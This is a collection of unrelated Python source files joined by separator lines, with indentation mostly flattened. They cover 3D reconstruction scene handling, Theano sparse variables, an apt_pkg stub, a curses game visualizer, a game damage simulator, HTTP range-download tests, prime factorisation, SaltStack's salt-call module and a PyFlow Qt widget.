point3D_ids.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = np.array(
[self.point3D_id_to_point3D_idx[point3D_id] for point3D_id in point3D_ids]
)
return self.points3D[point3D_idxs, :]
# ---------------------------------------------------------------------------
# project *all* 3D points into image, return their projection coordinates,
# as well as their 3D positions
def get_viewed_points(self, image_id):
image = self.images[image_id]
# get unfiltered points
point3D_idxs = set(self.point3D_id_to_point3D_idx.values())
point3D_idxs.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = list(point3D_idxs)
points3D = self.points3D[point3D_idxs, :]
# orient points relative to camera
R = image.q.ToR()
points3D = points3D.dot(R.T) + image.tvec[np.newaxis, :]
points3D = points3D[points3D[:, 2] > 0, :] # keep points with positive z
# put points into image coordinates
camera = self.cameras[image.camera_id]
points2D = points3D.dot(camera.get_camera_matrix().T)
points2D = points2D[:, :2] / points2D[:, 2][:, np.newaxis]
# keep points that are within the image
mask = (
(points2D[:, 0] >= 0)
& (points2D[:, 1] >= 0)
& (points2D[:, 0] < camera.width - 1)
& (points2D[:, 1] < camera.height - 1)
)
return points2D[mask, :], points3D[mask, :]
# ---------------------------------------------------------------------------
def add_camera(self, camera):
self.last_camera_id += 1
self.cameras[self.last_camera_id] = camera
return self.last_camera_id
# ---------------------------------------------------------------------------
def add_image(self, image):
self.last_image_id += 1
self.images[self.last_image_id] = image
return self.last_image_id
# ---------------------------------------------------------------------------
def delete_images(self, image_list):
# delete specified images
for image_id in image_list:
if image_id in self.images:
del self.images[image_id]
keep_set = set(self.images.keys())
# delete references to specified images, and ignore any points that are
# invalidated
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
mask = np.array(
[
image_id in keep_set
for image_id in self.point3D_id_to_images[point3D_id][:, 0]
]
)
if np.any(mask):
self.point3D_id_to_images[point3D_id] = self.point3D_id_to_images[
point3D_id
][mask]
else:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# image_set: set of image ids whose points we'd like to keep
# min/max triangulation angle: in degrees
def filter_points3D(
self,
min_track_len=0,
max_error=np.inf,
min_tri_angle=0,
max_tri_angle=180,
image_set=set(),
):
image_set = set(image_set)
check_triangulation_angles = min_tri_angle > 0 or max_tri_angle < 180
if check_triangulation_angles:
max_tri_prod = np.cos(np.radians(min_tri_angle))
min_tri_prod = np.cos(np.radians(max_tri_angle))
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
image_ids = []
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
if image_set or min_track_len > 0:
image_ids = set(self.point3D_id_to_images[point3D_id][:, 0])
# check if error and min track length are sufficient, or if none of
# the selected cameras see the point
if (
len(image_ids) < min_track_len
or self.point3D_errors[point3D_idx] > max_error
or image_set
and image_set.isdisjoint(image_ids)
):
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# find dot product between all camera viewing rays
elif check_triangulation_angles:
xyz = self.points3D[point3D_idx, :]
tvecs = np.array(
[(self.images[image_id].tvec - xyz) for image_id in image_ids]
)
tvecs /= np.linalg.norm(tvecs, axis=-1)[:, np.newaxis]
cos_theta = np.array([u.dot(v) for u, v in combinations(tvecs, 2)])
# min_prod = cos(maximum viewing angle), and vice versa
# if maximum viewing angle is too small or too large,
# don't add this point
if np.min(cos_theta) > max_tri_prod or np.max(cos_theta) < min_tri_prod:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# apply the filters to the image point3D_ids
for image in self.images.values():
mask = np.array(
[
self.point3D_id_to_point3D_idx.get(point3D_id, 0)
== SceneManager.INVALID_POINT3D
for point3D_id in image.point3D_ids
]
)
image.point3D_ids[mask] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# scene graph: {image_id: [image_id: #shared points]}
def build_scene_graph(self):
self.scene_graph = defaultdict(lambda: defaultdict(int))
point3D_iter = self.point3D_id_to_images.items()
for i, (point3D_id, images) in enumerate(point3D_iter):
if not self.point3D_valid(point3D_id):
continue
for image_id1, image_id2 in combinations(images[:, 0], 2):
self.scene_graph[image_id1][image_id2] += 1
self.scene_graph[image_id2][image_id1] += 1
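# Example usage (a rough sketch; the paths below are placeholders, not part of
# this module): load an existing COLMAP reconstruction, drop low-quality
# points, and write the result back out using only the methods defined above.
if __name__ == "__main__":
    sm = SceneManager("/path/to/sparse/0/")
    sm.load()
    print(len(sm.cameras), "cameras,", len(sm.images), "images,",
          len(sm.points3D), "points3D")
    # keep points seen by at least 3 images with reprojection error <= 2 px
    sm.filter_points3D(min_track_len=3, max_error=2.0)
    sm.save("/path/to/sparse_filtered/", binary=True)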
|
from __future__ import absolute_import, print_function, division
import copy
import scipy.sparse
from theano.compile import shared_constructor, SharedVariable
from theano.sparse.basic import SparseType, _sparse_py_operators
class SparseTensorSharedVariable(_sparse_py_operators, SharedVariable):
dtype = property(lambda self: self.type.dtype)
format = property(lambda self: self.type.format)
@shared_constructor
def sparse_constructor(value, name=None, strict=False, allow_downcast=None,
borrow=False, format=None):
"""
SharedVariable Constructor for SparseType.
Wraps a scipy.sparse matrix in a SparseTensorSharedVariable. The sparse
format defaults to that of `value`, and the value is deep-copied unless
`borrow` is True.
"""
if not isinstance(value, scipy.sparse.spmatrix):
raise TypeError("Expected a sparse matrix in the sparse shared variable constructor. Received: ",
value.__class__)
if format is None:
format = value.format
type = SparseType(format=format, dtype=value.dtype)
if not borrow:
value = copy.deepcopy(value)
return SparseTensorSharedVariable(type=type, value=value, name=name,
strict=strict, allow_downcast=allow_downcast)
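if __name__ == "__main__":
    # Minimal sketch (assumes SciPy is installed): theano.shared dispatches a
    # scipy.sparse value to the constructor registered above via
    # @shared_constructor, so the result exposes the properties defined on
    # SparseTensorSharedVariable.
    import scipy.sparse as sp
    import theano
    x = theano.shared(sp.csr_matrix((3, 3), dtype="float64"), name="x")
    print(x.format, x.dtype)  # -> csr float64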
|
# encoding: utf-8
# module apt_pkg
# from /usr/lib/python3/dist-packages/apt_pkg.cpython-35m-x86_64-linux-gnu.so
# by generator 1.145
"""
Classes and functions wrapping the apt-pkg library.
The apt_pkg module provides several classes and functions for accessing
the functionality provided by the apt-pkg library. Typical uses might
include reading APT index files and configuration files and installing
or removing packages.
"""
# no imports
from .object import object
class PackageRecords(object):
"""
PackageRecords(cache: apt_pkg.Cache)
Package Records contain information about packages. Those objects
can be used to retrieve information such as maintainer or filename
of a package. They can also be used to retrieve the raw records
of the packages (i.e. those stanzas stored in Packages files).
"""
def lookup(self, packagefile_and_index): # takes a single (PackageFile, index) tuple; real signature unknown; restored from __doc__
"""
lookup((packagefile: apt_pkg.PackageFile, index: int)) -> bool
Changes to a new package
"""
return False
def __init__(self, cache): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
filename = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The filename of the package, as stored in the 'Filename' field."""
homepage = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The homepage of the package, as stored in the 'Homepage' field."""
long_desc = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The long description of the packages; i.e. all lines in the
'Description' field except for the first one."""
maintainer = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The maintainer of the package, as stored in the 'Maintainer' field."""
md5_hash = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The MD5 hash value of the package, as stored in the 'MD5Sum' field."""
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The name of the package, as stored in the 'Package' field."""
record = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The raw record, suitable for parsing by apt_pkg.TagSection."""
sha1_hash = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The SHA1 hash value, as stored in the 'SHA1' field."""
sha256_hash = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The SHA256 hash value, as stored in the 'SHA256' field."""
short_desc = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The short description of the package, i.e. the first line of the
'Description' field."""
source_pkg = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The name of the source package, if different from the name of the
binary package. This information is retrieved from the 'Source' field."""
source_ver = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The version of the source package, if it differs from the version
of the binary package. Just like 'source_pkg', this information
is retrieved from the 'Source' field."""
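# Rough usage sketch (not part of the generated stub above; the package name
# "bash" is only an example): with the real apt_pkg extension, a PackageRecords
# object is fed a (PackageFile, index) tuple taken from a version's file_list,
# after which the properties documented above are populated.
if __name__ == "__main__":
    import apt_pkg
    apt_pkg.init()
    cache = apt_pkg.Cache()
    records = apt_pkg.PackageRecords(cache)
    version = cache["bash"].version_list[0]
    if records.lookup(version.file_list[0]):
        print(records.maintainer)
        print(records.filename)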
|
"""
Examples:
visualizer.py
visualizer.py --map=gen/hz.txt --lm="py:lm_ai.Oscillating(frequency=5)" ghc:fickle.ghc ghc:miner.ghc
Controls:
ESC, q - quit
b - one step back
arrows - control interactive lm
any key - one step of non-interactive lm
"""
import random
import curses
import logging
import argparse
import os
import sys
import copy
import map_loader
import game
from game import GhostAI, Map, LambdaMan
from game import InteractiveLambdaManAI, set_interactive_lambda_man_direction
from log_context import log_context, decorate_handlers
MAX_HISTORY_SIZE = 100
DIRECTION_KEYS = [
curses.KEY_UP, curses.KEY_RIGHT, curses.KEY_DOWN, curses.KEY_LEFT]
def main():
# clear old log
with open('visualizer_debug.log', 'w'):
pass
logging.basicConfig(
level=logging.INFO,
format='%(levelname)8s:%(name)15s: %(message)s',
filename='visualizer_debug.log')
import ghc
ghc.logger.setLevel(logging.WARNING)
decorate_handlers()
parser = argparse.ArgumentParser()
parser.add_argument(
'--map', default='default_map.txt',
help='map file, relative to data/maps')
parser.add_argument('--lm', default='interactive:', help='lm spec')
parser.add_argument('ghost', nargs='*', help='ghost specs')
args = parser.parse_args()
if not args.ghost:
args.ghost = [
'py:GhostAI_Shortest',
'ghc:fickle.ghc',
]
print 'no ghosts specified, using', args.ghost
map = map_loader.load_map(args.map)
map.set_ai_specs(args.lm, args.ghost)
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.keypad(1)
curses.start_color()
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_BLUE, curses.COLOR_BLACK)
ghost_colors = [curses.color_pair(i) for i in 2, 3, 4, 5]
try:
history = []
while not map.game_over():
history = history[-MAX_HISTORY_SIZE:]
for y in range(map.height()):
stdscr.addstr(y, 0, map.line_as_text(y))
for i, ghost in enumerate(map.ghosts):
idx = ghost.index % len(args.ghost)
if ghost.vitality != game.INVISIBLE:
stdscr.addstr(ghost.y, ghost.x, '=', ghost_colors[idx])
stdscr.addstr(
i, map.width() + 1,
'{} {}'.format(ghost.vitality, args.ghost[idx]), ghost_colors[idx])
#for i, ghost in enumerate(args.ghost):
stdscr.addstr(
len(map.ghosts) + 1, map.width() + 1,
'pill: {} '.format(map.remaining_power_pill_ticks()),
curses.color_pair(1))
stdscr.addstr(
len(map.ghosts) + 2, map.width() + 1,
'lives: {} '.format(map.lambdaman.lives),
curses.color_pair(1))
stdscr.addstr(map.height(), 0, "Tick {0} Score {1} ".format(
map.move_queue[0].next_move, map.lambdaman.score))
stdscr.refresh()
next_actor = map.move_queue[0]
if isinstance(next_actor, LambdaMan):
quit_game = False
rewind = False
if args.lm == 'interactive:':
while True:
c = stdscr.getch()
if c in (27, 113): # ESC, q
quit_game = True
break
if c == ord('b'):
rewind = True
break
if c in DIRECTION_KEYS:
set_interactive_lambda_man_direction(
DIRECTION_KEYS.index(c))
break
stdscr.addstr(map.height()+1, 0, "Unknown key {}".format(c))
stdscr.refresh()
else:
c = stdscr.getch()
if c in (27, 113): # ESC, q
quit_game = True
elif c == ord('b'):
rewind = True
if quit_game:
break
if rewind:
if not history:
stdscr.addstr(map.height()+1, 0, 'no more history')
stdscr.refresh()
else:
map = history.pop()
continue
history.append(copy.deepcopy(map))
with log_context('step'):
map.step()
finally:
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
print "Tick {0} Score {1}".format(map.current_tick,
map.lambdaman.score)
if __name__ == '__main__':
main()
|
from core.advbase import *
from slot.a import *
def module():
return Aldred
class Aldred(Adv):
comment = 'maintain dragondrive'
conf = {}
conf['slots.a'] = Heralds_of_Hinomoto()+Dear_Diary()
conf['slots.poison.a'] = Heralds_of_Hinomoto()+The_Plaguebringer()
conf['acl'] = """
`s3, not self.s3_buff
`s2
`dragon, not self.dragondrive_buff.get()
`s1, x=5
"""
coab = ['Wand','Berserker','Curran']
def prerun(self):
self.dragondrive_buff = Selfbuff('dragondrive', 0.30, -1, 's', 'passive')
self.dragonform.set_dragondrive(self.dragondrive_buff)
self.a3_str = Modifier('a3', 'att', 'passive', 0.20)
self.s2_str = Selfbuff('s2', 0.20, -1, 'att', 'buff') # doesnt proc doublebuff reeeee
self.s2_tick = Timer(self.s2_degen, 2.9, 1)
self.s2_stuff_timer = Timer(self.s2_stuff_off)
self.s2_on = False
self.hp = 100
self.conf.x1.utp = 120
self.conf.x2.utp = 120
self.conf.x3.utp = 120
self.conf.x4.utp = 180
self.conf.x5.utp = 180
def d_slots(self):
if self.duration <= 60:
self.conf['slots.a'] = The_Chocolatiers()+TL()
self.conf['slots.poison.a'] = The_Chocolatiers()+The_Plaguebringer()
def x_proc(self, e):
if self.dragondrive_buff.get():
try:
utp = self.conf[e.name].utp
self.dragonform.charge_gauge(utp, utp=True)
except:
pass
def s1_proc(self, e):
if self.dragondrive_buff.get():
with CrisisModifier('s1', 1.00, self.hp):
self.dmg_make('s1', 2.42*4)
self.dragonform.add_drive_gauge_time(self.s1.ac.getstartup()+self.s1.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(-750, utp=True)
self.s1.charge(self.sp_convert(0.50, self.conf.s1.sp))
else:
self.dmg_make('s1', 2.42*4)
# 242 * 4 mod, 4 hits, 2.4s
# 242 * 4 w/ 2x crisis
# -750 dd points
# +50% skill gauge
# 2.1666667461395264
def s2_proc(self, e):
if self.dragondrive_buff.get():
self.s2_stuff_on()
self.s2_stuff_timer.on(40 * self.mod('bt'))
self.dragonform.add_drive_gauge_time(self.s2.ac.getstartup()+self.s2.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(3000, utp=True)
else:
self.dragonform.charge_gauge(1200, utp=True)
# 1 hp loss = 1 gauge gain, will assume 3000 max hp here
if self.hp > 30:
self.dragonform.charge_gauge(3000 * (self.hp-30)/100, utp=True)
self.hp = 30
# +1200 dd points
# 1.3333333730697632s
def s2_stuff_on(self):
self.a3_str.on()
self.s2_str.on()
self.s2_tick.on()
def s2_stuff_off(self, t):
self.a3_str.off()
self.s2_str.off()
self.s2_tick.off()
def s2_degen(self, t):
self.hp = max(self.hp-6, 0)
if __name__ == '__main__':
import sys
from core.simulate import test_with_argv
test_with_argv(None, *sys.argv)
|
# coding: utf-8
import io
import os
import shutil
import tempfile
import unittest
from edo_client import WoClient
class ContentApi_DownloadTestCase(unittest.TestCase):
'''
- Basically this is to ensure
all the facilities related to HTTP range headers are working properly;
'''
@classmethod
def setUpClass(cls):
cls.file_size = 10 * (2 ** 20)
cls.download_url = 'http://192.168.1.115/docker/unittest/10mb.test'
cls.api_url = 'https://httpbin.org/redirect-to?url={}'.format(
cls.download_url
)
cls.empty_file_url = 'http://192.168.1.115/docker/unittest/empty_file.bin'
# We're just testing some basic util functions,
# and don't want a real WoClient instance
cls.client = WoClient(
cls.api_url + '#',
'', '', '', '',
account='', instance=''
)
cls.tmpdir = tempfile.mkdtemp()
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.tmpdir)
def test_01_get_download_url(self):
self.assertEqual(
self.client.content.get_download_url(uid=''),
self.download_url,
'Should be able to extract direct download URL from 302 redirect'
)
def test_11_download_to_stream_all(self):
'''Test: download the whole file into a stream'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url
)
self.assertEqual(
self.file_size,
stream.tell(),
'Cursor should be at the end of stream after download'
)
stream.seek(0, os.SEEK_SET)
self.assertEqual(
self.file_size,
len(stream.read()),
'File length should be {} bytes'.format(self.file_size)
)
def test_12_download_stream_first_byte(self):
'''Test: download the first byte into a stream'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url, start=0, end=0,
)
self.assertEqual(1, stream.tell(), 'Download first byte of file')
def test_13_download_stream_head_part(self):
'''Test: download a leading part of the file into a stream'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url, start=0, end=(5 * (2 ** 20) - 1),
)
self.assertEqual(5 * (2 ** 20), stream.tell())
def test_14_download_stream_tail_part(self):
'''Test: starting from the middle, download the trailing half into a stream'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url, start=(5 * (2 ** 20)), end=None,
)
self.assertEqual(5 * (2 ** 20), stream.tell())
def test_15_download_partial(self):
'''Test: starting from the middle, download a part of the file into a stream'''
stream = io.BytesIO()
start, end = 1234, 54321
self.client.content.download_to_stream(
stream, url=self.download_url, start=start, end=end,
)
self.assertEqual(stream.tell(), end - start + 1)
def test_21_get_data_full_size(self):
'''Test: read the full file content'''
self.assertEqual(
self.file_size,
len(self.client.content.get_data(url=self.download_url)),
'.get_data should be able to download the whole file by default',
)
def test_22_get_data_first_byte(self):
'''Test: read the first byte of the file'''
self.assertEqual(
1,
len(self.client.content.get_data(url=self.download_url, size=1)),
'.get_data should be able to download the 1st byte of given file',
)
def test_23_get_data_head_part(self):
'''Test: read a leading part of the file content'''
size = 5432
self.assertEqual(
size,
len(self.client.content.get_data(url=self.download_url, size=size)), # noqa E501
'.get_data should download the first {} bytes'.format(size),
)
def test_24_get_data_tail_part(self):
'''Test: starting from the middle, read the trailing part of the file'''
start = 12345
size = self.file_size - start
self.assertEqual(
size,
len(self.client.content.get_data(
url=self.download_url,
offset=start, size=size
)),
'.get_data should download the last {} bytes'.format(size),
)
def test_25_get_data_partial(self):
'''Test: starting from the middle, read a part of the file content'''
start = 23451
size = self.file_size - start
self.assertEqual(
size,
len(self.client.content.get_data(
url=self.download_url,
offset=start, size=size,
)),
'.get_data should download {} bytes starting from offset {}'.format(size, start), # noqa E501
)
def test_31_download_to_file(self):
'''Test: download the whole file to local disk'''
fd, fpath = tempfile.mkstemp(dir=self.tmpdir)
os.close(fd)
self.client.content.download_to_file(destination=fpath, url=self.download_url)
self.assertEqual(self.file_size, os.stat(fpath).st_size)
def test_41_download_empty_file(self):
'''Test: download an empty file to local disk'''
fd, fpath = tempfile.mkstemp(dir=self.tmpdir)
os.close(fd)
self.client.content.download_to_file(destination=fpath, url=self.empty_file_url)
self.assertEqual(0, os.stat(fpath).st_size)
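# Small reference helper (not used by the tests above): the assertions rely on
# HTTP range semantics where "bytes=start-end" is inclusive at both ends, so a
# partial download of start..end should contain end - start + 1 bytes.
def expected_range_length(start, end, file_size):
    """Number of bytes a byte-range request for start..end should return."""
    if end is None or end >= file_size:
        end = file_size - 1
    return end - start + 1
# e.g. expected_range_length(1234, 54321, 10 * 2 ** 20) == 54321 - 1234 + 1 == 53088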
|
n = int(input('Enter a number: '))
factors = []
while n % 2 == 0:
factors.append(2)
n //= 2
divisor = 3
while n != 1 and divisor <= n:
if n % divisor == 0:
factors.append(divisor)
n //= divisor
else:
divisor += 2
print('The prime factors are:')
for factor in factors:
print(factor, end=" ")
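# A reusable function form of the same trial-division idea (a separate sketch
# alongside the interactive script above). Bounding the divisor by sqrt(n)
# means any n > 1 left at the end is itself prime.
def prime_factors(n):
    """Return the prime factorisation of n, e.g. prime_factors(84) -> [2, 2, 3, 7]."""
    result = []
    divisor = 2
    while divisor * divisor <= n:
        while n % divisor == 0:
            result.append(divisor)
            n //= divisor
        divisor += 1 if divisor == 2 else 2
    if n > 1:
        result.append(n)
    return result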
|
# -*- coding: utf-8 -*-
'''
The caller module is used as a front-end to manage direct calls to the salt
minion modules.
'''
# Import python libs
from __future__ import print_function
import os
import sys
import logging
import datetime
import traceback
# Import salt libs
import salt.exitcodes
import salt.loader
import salt.minion
import salt.output
import salt.payload
import salt.transport
import salt.utils.args
from salt._compat import string_types
from salt.log import LOG_LEVELS
from salt.utils import print_cli
log = logging.getLogger(__name__)
try:
from raet import raeting, nacling
from raet.lane.stacking import LaneStack
from raet.lane.yarding import RemoteYard
except ImportError:
# Don't die on missing transport libs since only one transport is required
pass
# Custom exceptions
from salt.exceptions import (
SaltClientError,
CommandNotFoundError,
CommandExecutionError,
SaltInvocationError,
)
class Caller(object):
'''
Factory class to create salt-call callers for different transport
'''
@staticmethod
def factory(opts, **kwargs):
# Default to ZeroMQ for now
ttype = 'zeromq'
# determine the ttype
if 'transport' in opts:
ttype = opts['transport']
elif 'transport' in opts.get('pillar', {}).get('master', {}):
ttype = opts['pillar']['master']['transport']
# switch on available ttypes
if ttype == 'zeromq':
return ZeroMQCaller(opts, **kwargs)
elif ttype == 'raet':
return RAETCaller(opts, **kwargs)
else:
raise Exception('Callers are only defined for ZeroMQ and raet')
# return NewKindOfCaller(opts, **kwargs)
class ZeroMQCaller(object):
'''
Object to wrap the calling of local salt modules for the salt-call command
'''
def __init__(self, opts):
'''
Pass in the command line options
'''
self.opts = opts
self.opts['caller'] = True
self.serial = salt.payload.Serial(self.opts)
# Handle this here so other deeper code which might
# be imported as part of the salt api doesn't do a
# nasty sys.exit() and tick off our developer users
try:
self.minion = salt.minion.SMinion(opts)
except SaltClientError as exc:
raise SystemExit(str(exc))
def call(self):
'''
Call the module
'''
# raet channel here
ret = {}
fun = self.opts['fun']
ret['jid'] = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.now())
proc_fn = os.path.join(
salt.minion.get_proc_dir(self.opts['cachedir']),
ret['jid']
)
if fun not in self.minion.functions:
sys.stderr.write('Function {0} is not available\n'.format(fun))
sys.exit(-1)
try:
sdata = {
'fun': fun,
'pid': os.getpid(),
'jid': ret['jid'],
'tgt': 'salt-call'}
args, kwargs = salt.minion.load_args_and_kwargs(
self.minion.functions[fun],
salt.utils.args.parse_input(self.opts['arg']),
data=sdata)
try:
with salt.utils.fopen(proc_fn, 'w+b') as fp_:
fp_.write(self.serial.dumps(sdata))
except NameError:
# Don't require msgpack with local
pass
except IOError:
sys.stderr.write(
'Cannot write to process directory. '
'Do you have permissions to '
'write to {0} ?\n'.format(proc_fn))
func = self.minion.functions[fun]
try:
ret['return'] = func(*args, **kwargs)
except TypeError as exc:
trace = traceback.format_exc()
sys.stderr.write('Passed invalid arguments: {0}\n'.format(exc))
active_level = LOG_LEVELS.get(
self.opts['log_level'].lower(), logging.ERROR)
if active_level <= logging.DEBUG:
sys.stderr.write(trace)
sys.exit(salt.exitcodes.EX_GENERIC)
try:
ret['retcode'] = sys.modules[
func.__module__].__context__.get('retcode', 0)
except AttributeError:
ret['retcode'] = 1
except (CommandExecutionError) as exc:
msg = 'Error running \'{0}\': {1}\n'
active_level = LOG_LEVELS.get(
self.opts['log_level'].lower(), logging.ERROR)
if active_level <= logging.DEBUG:
sys.stderr.write(traceback.format_exc())
sys.stderr.write(msg.format(fun, str(exc)))
sys.exit(salt.exitcodes.EX_GENERIC)
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found: {1}\n'
sys.stderr.write(msg.format(fun, str(exc)))
sys.exit(salt.exitcodes.EX_GENERIC)
try:
os.remove(proc_fn)
except (IOError, OSError):
pass
if hasattr(self.minion.functions[fun], '__outputter__'):
oput = self.minion.functions[fun].__outputter__
if isinstance(oput, string_types):
ret['out'] = oput
is_local = self.opts['local'] or self.opts.get(
'file_client', False) == 'local'
returners = self.opts.get('return', '').split(',')
if (not is_local) or returners:
ret['id'] = self.opts['id']
ret['fun'] = fun
ret['fun_args'] = self.opts['arg']
for returner in returners:
try:
ret['success'] = True
self.minion.returners['{0}.returner'.format(returner)](ret)
except Exception:
pass
# return the job infos back up to the respective minion's master
if not is_local:
try:
mret = ret.copy()
mret['jid'] = 'req'
self.return_pub(mret)
except Exception:
pass
# close raet channel here
return ret
def return_pub(self, ret):
'''
Return the data up to the master
'''
channel = salt.transport.Channel.factory(self.opts, usage='salt_call')
load = {'cmd': '_return', 'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
channel.send(load)
def print_docs(self):
'''
Pick up the documentation for all of the modules and print it out.
'''
docs = {}
for name, func in self.minion.functions.items():
if name not in docs:
if func.__doc__:
docs[name] = func.__doc__
for name in sorted(docs):
if name.startswith(self.opts.get('fun', '')):
print_cli('{0}:\n{1}\n'.format(name, docs[name]))
def print_grains(self):
'''
Print out the grains
'''
grains = salt.loader.grains(self.opts)
salt.output.display_output({'local': grains}, 'grains', self.opts)
def run(self):
'''
Execute the salt call logic
'''
try:
ret = self.call()
out = ret.get('out', 'nested')
if self.opts['metadata']:
print_ret = ret
out = 'nested'
else:
print_ret = ret.get('return', {})
salt.output.display_output(
{'local': print_ret},
out,
self.opts)
if self.opts.get('retcode_passthrough', False):
sys.exit(ret['retcode'])
except SaltInvocationError as err:
raise SystemExit(err)
class RAETCaller(ZeroMQCaller):
'''
Object to wrap the calling of local salt modules for the salt-call command
when transport is raet
'''
def __init__(self, opts):
'''
Pass in the command line options
'''
self.stack = self._setup_caller_stack(opts)
salt.transport.jobber_stack = self.stack
super(RAETCaller, self).__init__(opts)
def run(self):
'''
Execute the salt call logic
'''
try:
ret = self.call()
self.stack.server.close()
salt.transport.jobber_stack = None
if self.opts['metadata']:
print_ret = ret
else:
print_ret = ret.get('return', {})
salt.output.display_output(
{'local': print_ret},
ret.get('out', 'nested'),
self.opts)
if self.opts.get('retcode_passthrough', False):
sys.exit(ret['retcode'])
except SaltInvocationError as err:
raise SystemExit(err)
def _setup_caller_stack(self, opts):
'''
Setup and return the LaneStack and Yard used by by channel when global
not already setup such as in salt-call to communicate to-from the minion
'''
mid = opts['id']
sockdirpath = opts['sock_dir']
uid = nacling.uuid(size=18)
name = 'caller' + uid
stack = LaneStack(name=name,
lanename=mid,
sockdirpath=sockdirpath)
stack.Pk = raeting.packKinds.pack
stack.addRemote(RemoteYard(stack=stack,
name='manor',
lanename=mid,
dirpath=sockdirpath))
log.debug("Created Caller Jobber Stack {0}\n".format(stack.name))
return stack
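# Rough sketch of driving the factory directly (normally the salt-call CLI
# builds opts for you). salt.config.minion_config supplies the defaults; the
# extra keys below are the ones Caller.call()/run() read explicitly, and the
# config path is only an assumption.
if __name__ == '__main__':
    import salt.config
    _opts = salt.config.minion_config('/etc/salt/minion')
    _opts.update({'fun': 'test.ping', 'arg': [], 'metadata': False, 'local': True})
    Caller.factory(_opts).run()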
|
## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from nine import str
from PyFlow.UI.Canvas.UICommon import clearLayout
from PyFlow.UI.Widgets.EditPropertiesWidget import EditPropertiesTreeWidget
from PyFlow.UI.Widgets.EditSecurityRatingWidget import EditSecurityRatingTreeWidget
from Qt import QtWidgets
from Qt import QtCore, QtGui
# Framework
class HeadButton(QtWidgets.QPushButton):
"""docstring for HeadButton."""
def __init__(self, parent=None, maxHeight=25):
super(HeadButton, self).__init__(parent)
self.setObjectName(self.__class__.__name__)
self.setDefault(True)
self.setMaximumHeight(maxHeight)
class CollapsibleWidget(QtWidgets.QWidget):
"""Has content widget and button on top to hide or show content"""
def __init__(self, parent=None, headName="Collapse", noSpacer=True, collapsed=False):
super(CollapsibleWidget, self).__init__(parent)
self.setObjectName(self.__class__.__name__)
self.setupUi()
self.connectUi()
self.setButtonName(headName)
if noSpacer:
self.removeSpacer()
self.setCollapsed(collapsed)
def filterContent(self, pattern):
pass
def title(self):
return self.pbHead.text()
def setReadOnly(self, bReadOnly=True):
self.ContentWidget.setEnabled(not bReadOnly)
def connectUi(self):
self.pbHead.clicked.connect(self.toggleCollapsed)
def setupUi(self):
self.resize(400, 300)
self.mainVLayout = QtWidgets.QVBoxLayout(self)
self.mainVLayout.setSpacing(2)
self.mainVLayout.setContentsMargins(2, 2, 2, 2)
self.mainVLayout.setObjectName("mainVLayout")
self.mainVLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.pbHead = HeadButton(self)
self.mainVLayout.addWidget(self.pbHead)
self.setMinimumHeight(30)
self.ContentWidget = QtWidgets.QWidget(self)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ContentWidget.sizePolicy().hasHeightForWidth())
self.ContentWidget.setSizePolicy(sizePolicy)
self.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred))
self.ContentWidget.setObjectName("ContentWidget")
self.ContentWidget.setContentsMargins(10, 0, 0, 0)
